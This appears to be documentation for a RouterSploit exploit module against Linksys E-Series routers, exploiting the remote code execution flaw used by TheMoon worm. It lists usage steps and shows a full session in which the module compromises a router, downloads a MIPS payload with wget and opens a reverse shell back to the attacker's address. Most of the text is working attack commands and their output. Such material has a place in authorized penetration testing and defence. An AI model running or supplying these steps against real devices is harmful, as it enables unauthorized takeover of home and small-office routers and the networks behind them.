Description
This module exploits remote code execution vulnerability in multiple Linksys E-Series devices. Vulnerability was actively used by TheMoon worm.
Verification Steps
1. Start `./rsf.py`
2. Do: `use exploits/routers/linksys/eseries_themoon_rce`
3. Do `uset target [TargetIP]`
4. Do `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.
6. Do `set payload reverse_tcp`
7. Do `set lhost [AttackerIP]`
8. Do `run`
9. Payload is sent to device and executed providing attacker with the command shell.
Scenarios
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target appears to be vulnerable
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture.
reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture.
cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options
Payload Options:
Name Current settings Description
---- ---------------- -----------
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell